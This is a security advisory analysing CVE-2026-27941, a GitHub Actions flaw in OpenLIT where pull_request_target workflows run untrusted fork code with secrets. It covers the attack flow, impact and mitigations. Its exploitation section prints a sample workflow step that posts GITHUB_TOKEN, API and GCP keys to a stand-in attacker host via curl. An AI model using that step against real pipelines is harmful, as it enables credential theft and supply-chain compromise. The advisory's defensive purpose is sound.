CVE-2026-27941
CVE-2026-27941
Weakness (CWE)
CVSS Vector
v3.1- Attack Vector
- Network
- Attack Complexity
- Low
- Privileges Required
- Low
- User Interaction
- None
- Scope
- Changed
- Confidentiality
- High
- Integrity
- High
- Availability
- High
Description
OpenLIT is an open source platform for AI engineering. Prior to version 1.37.1, several GitHub Actions workflows in OpenLIT's GitHub repository use the `pull_request_target` event while checking out and executing untrusted code from forked pull requests. These workflows run with the security context of the base repository, including a write-privileged `GITHUB_TOKEN` and numerous sensitive secrets (API keys, database/vector store tokens, and a Google Cloud service account key). Version 1.37.1 contains a fix.
CVE-2026-27941: Comprehensive Technical Analysis
Executive Summary
CVE-2026-27941 represents a critical security vulnerability in OpenLIT's GitHub Actions CI/CD pipeline configuration, scoring 9.9 on the CVSS scale. This vulnerability stems from the insecure use of the pull_request_target event trigger combined with execution of untrusted code, creating a pathway for attackers to compromise the repository's security context and exfiltrate sensitive credentials.
1. Vulnerability Assessment and Severity Evaluation
Vulnerability Classification
- Type: CI/CD Pipeline Injection / Privilege Escalation
- Category: Insecure Workflow Configuration (CWE-829: Inclusion of Functionality from Untrusted Control Sphere)
- CVSS Score: 9.9 (Critical)
Severity Justification
The 9.9 CVSS score is warranted due to:
High Impact Factors:
- Confidentiality Impact: CRITICAL - Direct access to multiple sensitive secrets including:
- API keys for various services
- Database credentials
- Vector store authentication tokens
- Google Cloud service account keys
- Integrity Impact: CRITICAL - Write access to repository via privileged
GITHUB_TOKEN - Availability Impact: HIGH - Potential for supply chain compromise affecting downstream users
Attack Complexity:
- Low Barrier to Entry: Requires only the ability to create a forked repository and submit a pull request
- No Authentication Required: Any GitHub user can exploit this vulnerability
- No User Interaction: Automated workflow execution upon PR submission
Scope:
- Changed scope - affects resources beyond the vulnerable component (downstream users, integrated services)
2. Potential Attack Vectors and Exploitation Methods
Primary Attack Vector: Malicious Pull Request Injection
Attack Flow:
1. Attacker forks OpenLIT repository
2. Attacker modifies workflow files or code executed by workflows
3. Attacker submits pull request to upstream repository
4. GitHub Actions triggers pull_request_target workflow
5. Workflow executes with base repository context
6. Malicious code accesses GITHUB_TOKEN and secrets
7. Attacker exfiltrates credentials or modifies repository
Specific Exploitation Techniques
Technique 1: Direct Secret Exfiltration
# Malicious workflow modification
- name: Exfiltrate Secrets
run: |
curl -X POST https://attacker.com/collect \
-d "token=${{ secrets.GITHUB_TOKEN }}" \
-d "api_key=${{ secrets.API_KEY }}" \
-d "gcp_key=${{ secrets.GCP_SERVICE_ACCOUNT }}"
Technique 2: Repository Poisoning
- Use write-privileged
GITHUB_TOKENto:- Inject backdoors into main branch
- Modify release artifacts
- Alter security policies
- Create malicious releases
Technique 3: Supply Chain Attack
- Compromise build artifacts
- Inject malicious dependencies
- Modify container images
- Alter published packages
Technique 4: Lateral Movement
- Use exfiltrated GCP service account keys to access cloud infrastructure
- Leverage database credentials to compromise data stores
- Utilize API keys to access integrated third-party services
Technical Root Cause
The vulnerability exists because pull_request_target workflows:
- Run in the context of the base repository (not the fork)
- Have access to repository secrets
- Receive a write-privileged
GITHUB_TOKEN - Execute code from the head repository (the fork) when using
actions/checkout@v2withref: ${{ github.event.pull_request.head.sha }}
3. Affected Systems and Software Versions
Affected Versions
- OpenLIT versions: All versions prior to 1.37.1
- Affected Component: GitHub Actions workflow configurations
Affected Workflows
Based on typical vulnerable patterns, likely affected workflows include:
- CI/CD testing workflows
- Build and deployment pipelines
- Code quality/linting workflows
- Documentation generation workflows
- Any workflow using
pull_request_targettrigger
Infrastructure at Risk
- Primary: OpenLIT GitHub repository and CI/CD infrastructure
- Secondary:
- Google Cloud Platform resources (via service account compromise)
- Connected databases and vector stores
- Third-party services with exposed API keys
- Downstream users consuming OpenLIT packages
Dependency Chain Impact
Organizations using OpenLIT in their AI engineering pipelines face:
- Supply chain compromise risk
- Potential backdoored dependencies
- Compromised container images
- Malicious code injection in AI workflows
4. Recommended Mitigation Strategies
Immediate Actions (Priority 1)
For OpenLIT Users:
-
Upgrade Immediately: Update to version 1.37.1 or later
# Verify current version pip show openlit # Upgrade to patched version pip install --upgrade openlit>=1.37.1 -
Audit Existing Deployments: Check for signs of compromise
- Review recent workflow runs for anomalous behavior
- Audit repository commit history for unauthorized changes
- Check for unexpected network connections in logs
-
Rotate All Secrets: Assume compromise and rotate:
- GitHub personal access tokens
- API keys for integrated services
- Database credentials
- GCP service account keys
- Any other secrets accessible to workflows
For Repository Maintainers:
-
Implement Secure Workflow Patterns:
# SECURE: Use pull_request for untrusted code on: pull_request: types: [opened, synchronize] # If pull_request_target is necessary: on: pull_request_target: types: [labeled] jobs: secure-job: # Only run after manual review if: contains(github.event.pull_request.labels.*.name, 'safe-to-test') runs-on: ubuntu-latest steps: # DO NOT checkout PR code in this context - uses: actions/checkout@v3 with: ref: ${{ github.base_ref }} # Checkout base, not PR -
Implement Workflow Isolation:
# Separate workflows: one for untrusted code, one for secrets # Workflow 1: Run tests (no secrets) on: pull_request # Workflow 2: Deploy (with secrets, only on main) on: push: branches: [main]
Long-term Security Hardening (Priority 2)
-
Implement Least Privilege:
- Use fine-grained personal access tokens
- Limit
GITHUB_TOKENpermissions:permissions: contents: read pull-requests: read - Use environment-specific secrets with protection rules
-
Enable Branch Protection:
- Require code review for all PRs
- Enable status checks
- Restrict who can push to protected branches
- Require signed commits
-
Implement Security Scanning:
- Use GitHub's secret scanning
- Implement workflow security linters (e.g., actionlint)
- Enable Dependabot alerts
- Use SAST tools for workflow analysis
-
Monitoring and Detection:
# Add monitoring for suspicious activities - name: Audit Workflow Execution run: | # Log all environment variables (excluding secrets) env | grep -v SECRET | sort # Verify expected execution context echo "Actor: ${{ github.actor }}" echo "Repository: ${{ github.repository }}" -
Use OpenID Connect (OIDC) for Cloud Access:
- Replace long-lived service account keys with OIDC tokens
- Implement short-lived, scoped credentials
- Reduce blast radius of credential compromise
Organizational Policies
- Establish Workflow Review Process:
- Mandatory security review for workflow changes
- Separate approval process for workflows with secrets